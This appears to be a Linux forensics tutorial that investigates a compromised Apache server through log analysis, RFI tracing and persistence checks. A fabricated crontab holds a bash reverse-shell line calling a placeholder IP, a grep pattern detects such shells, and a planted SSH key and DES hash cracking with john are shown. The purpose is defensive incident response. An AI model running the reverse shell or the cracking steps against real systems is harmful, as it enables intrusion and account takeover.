Before starting the Linux server analysis, the case we will work through is the examination of a web server running Linux, covering Apache log analysis, web server analysis, and possible persistence mechanisms.

Here we will try to spot potential web attacks by drawing inferences both from the Linux system itself and from the related web application.
The most important attack surface on the server is probably the web service; fortunately, the Apache access log keeps a history of every request sent to the web server, including:

1- source address
2- response code and length
3- user agent
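For reference, one line of Apache's combined log format carries all three of these fields. A minimal sketch, using a fabricated sample line (every value below is invented), of pulling them out with awk:

```shell
# Fabricated sample line in Apache combined log format (the real file is
# typically /var/log/apache2/access.log on Debian/Ubuntu).
cat > /tmp/access_sample.log <<'EOF'
10.0.0.5 - - [12/Oct/2021:14:03:11 +0000] "GET /index.html HTTP/1.1" 200 1543 "-" "Mozilla/5.0"
EOF

# Field 1: source address; field 9: response code; field 10: response length;
# the last quoted string is the user agent.
awk '{print "src=" $1, "code=" $9, "len=" $10}' /tmp/access_sample.log
```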

We hooked up to our test machine.

The /var/log directory is always the first place I look during a review. For the case described above, I go straight to the Apache logs.

The access logs naturally draw my attention, so I check them. There is a lot of data, so I need to filter it.

By filtering, I mean searching for the strings that catch my eye while browsing the logs in general, like nmap or dirbuster.

Or we can try to spot common scanners directly with a command like this.
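A sketch of such a sweep, shown here against a fabricated sample log (the real path, typically /var/log/apache2/access.log on Debian/Ubuntu, and the exact tool names to match are assumptions; extend the pattern as needed):

```shell
# Fabricated sample; in practice point the grep at the real access log.
cat > /tmp/access_scan.log <<'EOF'
192.168.56.206 - - [12/Oct/2021:14:05:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine)"
192.168.56.206 - - [12/Oct/2021:14:05:09 +0000] "GET /admin/ HTTP/1.1" 404 221 "-" "DirBuster-1.0-RC1"
10.0.0.5 - - [12/Oct/2021:14:06:41 +0000] "GET /index.html HTTP/1.1" 200 1543 "-" "Mozilla/5.0"
EOF

# Case-insensitive match on well-known scanner user agents.
grep -iE 'nmap|dirbuster|nikto|gobuster|sqlmap' /tmp/access_scan.log
```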

Now the web application's interface looks as follows. For example, here I can easily find which directory allows users to upload files.

So, can I find which IP addresses upload files to this server?

If I look at the GET and POST requests in the access logs, along with the response codes, I can see the IP addresses involved.
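To answer the upload question more systematically, here is a sketch over a fabricated sample: POST requests are the usual upload traffic, so pulling each POST's source IP, target path, and status code narrows things down quickly (upload.php below is a hypothetical filename):

```shell
# Fabricated sample; upload.php is a hypothetical filename for illustration.
cat > /tmp/access_post.log <<'EOF'
192.168.56.206 - - [12/Oct/2021:14:10:33 +0000] "POST /resources/development/2021/docs/upload.php HTTP/1.1" 200 312 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Oct/2021:14:11:02 +0000] "GET /index.html HTTP/1.1" 200 1543 "-" "Mozilla/5.0"
EOF

# $1 = source IP, $7 = requested path, $9 = response code.
awk '$6 == "\"POST" {print $1, $7, $9}' /tmp/access_post.log
```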
Among these requests I can visit any directory that draws my attention, or examine it from the terminal. One point that caught my attention was the file under resources/development/2021/docs/, and when I opened it and looked at it,

When I focused on that lead and continued examining from the server terminal, look what I found: it appears the attacker got in via Remote File Inclusion (RFI).

Now, the possible persistence mechanisms I will check next:

1- cron
2- services/systemd
3- bashrc
4- Kernel modules
5- SSH keys

You know their locations by heart because you deal with them constantly, but of course you don't always have to; you can find any path or directory on Linux directly with the locate command.

As I said, dig around in whichever directory you like, as much as you like.
The reason I keep saying this is that Linux systems are managed from the command line (there are customized exceptions), so anomalies on the system cannot be spotted as easily as on Windows.

To master the directory layout and untangle this complexity of Linux, it is important to spend as much time in the directories as possible.
You will see that the correct path is /etc/crontab .

The trailing sh -i >& /dev/tcp/ 0>&1
should have caught your attention: it is a classic bash reverse shell.
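That pattern is easy to sweep for. A minimal sketch over a fabricated crontab (the second entry and its documentation-range IP are invented for illustration; in practice check /etc/crontab and /etc/cron.d/):

```shell
# Fabricated crontab; the second line mimics a reverse-shell persistence entry.
cat > /tmp/crontab_sample <<'EOF'
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root2 bash -c 'sh -i >& /dev/tcp/192.0.2.10/4444 0>&1'
EOF

# /dev/tcp, nc -e, and interactive-shell flags are classic reverse-shell
# indicators inside cron entries.
grep -E '/dev/tcp|nc -e|bash -i|sh -i' /tmp/crontab_sample
```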

The root2 user also catches my attention, so I start looking at the following locations, which are among the few places in Linux where account information is kept.
1- /etc/passwd — contains the names of most of the accounts on the system. It should be readable but not writable by normal users, and should not contain password hashes.
2- /etc/shadow — also contains the account names, but additionally stores the password hashes. It must have strict permissions.

There could be more data in /etc/passwd, but my goal is to find root2. With grep I pull out just the root2 entry and its hash, and now I will use hash-identifier to find out what kind of hash it is.
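A sketch of that grep, run against a fabricated shadow file (the hash below is an invented DES-crypt-style value, not the one from the case; reading the real /etc/shadow requires root):

```shell
# Fabricated shadow file; field 2 of each entry is the password hash.
cat > /tmp/shadow_sample <<'EOF'
root:*:18900:0:99999:7:::
root2:aaRrVb6vpoEVk:18900:0:99999:7:::
EOF

# Keep only the root2 line, then cut out the hash field.
grep '^root2:' /tmp/shadow_sample | cut -d: -f2
```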

hash-identifier says the algorithm is DES, so let's crack it then…

We cracked it with the john tool and recovered the second root account's password.
Now we are back in Apache log analysis. The log files are smaller this time; we can say the attacker is a little more cunning.

As we spotted above, obvious user agents may not always be visible. However, there are several other ways to identify traffic originating from tools rather than browsers. The time between requests is a good metric for most tools. You can also identify individual tools from the signatures they leave in requests; for example, when performing certain enumeration tasks, Nmap sends HTTP requests with a random non-standard method. More aggressive tools can also be identified by the number of requests sent during an attack; brute-force tools can be detected this way.
A poorly designed site can easily leak important information without the need for aggressive tools. In this case, the site uses sequential IDs for all of its products. An attacker can easily identify each product, or find the total size of the product database, simply by incrementing the product ID until a 404 error occurs.
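That kind of enumeration leaves a clear trail in the access log. A minimal sketch over a fabricated sample (the id parameter name and the paths are assumptions), listing the requested product IDs:

```shell
# Fabricated sample: sequential IDs requested one second apart, ending in a 404.
cat > /tmp/access_enum.log <<'EOF'
192.168.56.206 - - [12/Oct/2021:14:20:01 +0000] "GET /product?id=1 HTTP/1.1" 200 800 "-" "Mozilla/5.0"
192.168.56.206 - - [12/Oct/2021:14:20:02 +0000] "GET /product?id=2 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
192.168.56.206 - - [12/Oct/2021:14:20:03 +0000] "GET /product?id=3 HTTP/1.1" 404 221 "-" "Mozilla/5.0"
EOF

# Extract the requested IDs; a dense, gap-free run that stops at a 404
# betrays enumeration.
grep -oE 'id=[0-9]+' /tmp/access_enum.log | cut -d= -f2 | sort -n
```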

Now let’s look at the apache access logs on the following server again and you will understand what I mean.

I'm still looking at IP 192.168.56.206, because this absurd HTTP request confused me. The request line "\x16\x03" with a "400 0" response and empty referrer and user agent ("-" "-") indicates nmap: \x16\x03 is the start of a TLS handshake sent to a plaintext HTTP port.

If there are any backdoors, the SSH keys will show me: an added key is another excellent way for an attacker to keep their access, so additions to the authorized_keys file may be worth looking into.
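A sketch of that sweep, run here against a fabricated home tree (the key material and comment below are invented; in practice start the find at /root and /home):

```shell
# Fabricated home tree with a planted authorized_keys file.
mkdir -p /tmp/fakehome/user/.ssh
echo 'ssh-rsa AAAAB3FabricatedKeyData attacker@evil' > /tmp/fakehome/user/.ssh/authorized_keys

# List every authorized_keys with owner and modification time; a recent mtime
# on a long-idle account deserves a closer look.
find /tmp/fakehome -name authorized_keys -exec ls -la {} \; 2>/dev/null
```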

Right guess.

In addition, program execution history is another point worth looking into.
Of course, adding a public key to root’s authorized_keys requires root-level privileges, so it might be best to look for further evidence of privilege escalation. Overall, Linux stores a very small amount of program execution history compared to Windows, but there are still a few valuable resources, including:

  1. .bash_history — contains a history of commands run in Bash; this file is well known, easy to edit, and sometimes disabled.
  2. auth.log — contains a history of all commands run using sudo.
  3. history.log (apt) — contains a history of all tasks performed using apt — useful for tracking program installation and removal.
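A sketch of reading apt's history, over a fabricated sample (the real file is /var/log/apt/history.log, with rotated copies alongside it; the transaction below is invented):

```shell
# Fabricated apt history; each transaction records the exact command line.
cat > /tmp/apt_history.log <<'EOF'
Start-Date: 2021-10-12  09:14:03
Commandline: apt install netcat
End-Date: 2021-10-12  09:14:10
EOF

# Pull just the command lines that triggered each transaction.
grep '^Commandline:' /tmp/apt_history.log
```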

systemd services also log to the journal; these logs are kept in a binary format and must be read with a utility like journalctl. The binary format comes with some advantages: each journal is capable of self-verification, and it is more difficult to tamper with.

Malware can also maintain persistence using systemd, since scripts running under systemd run in the background and can be restarted when the system boots or when the script crashes. It is also relatively easy to hide malicious scripts, as they can blend in among the other services. systemd services are defined in .service files, which may include:

  1. Command that runs every time the service starts
  2. User running the service
  3. Optional description

In this case, the malware is pretty obvious, as it appears to be printing errors to the screen, so there's no way it is dormant. Running systemctl will list all the services installed on the system, and, much like on Windows, there are usually a lot of them. Adding --type=service --state=active to the command is worthwhile, as it reduces the list to running services. When the name of a suspicious service is found, more information can be extracted by running systemctl status <service name>.

OS Version Information

cat /etc/os-release

User Accounts

cat /etc/passwd | column -t -s :

Group Information

cat /etc/group

Login Information

  • Failed logins: /var/log/btmp
  • Historical data of logins: /var/log/wtmp

sudo last -f /var/log/wtmp

System Configuration Information


cat /etc/hostname


cat /etc/timezone

Network Configuration

cat /etc/network/interfaces
ip address show

Active Network Connection

netstat -natp

Active Running Processes

ps aux

DNS Information

cat /etc/hosts
cat /etc/resolv.conf

Started Services

ls /etc/init.d/

Sudo Execution History

cat /var/log/auth.log* | grep -i COMMAND | tail


Syslog

cat /var/log/syslog* | head

Auth Log

cat /var/log/auth.log* |head

We have only touched on the Linux forensics side superficially. In the next article, we will look at Linux forensics in depth.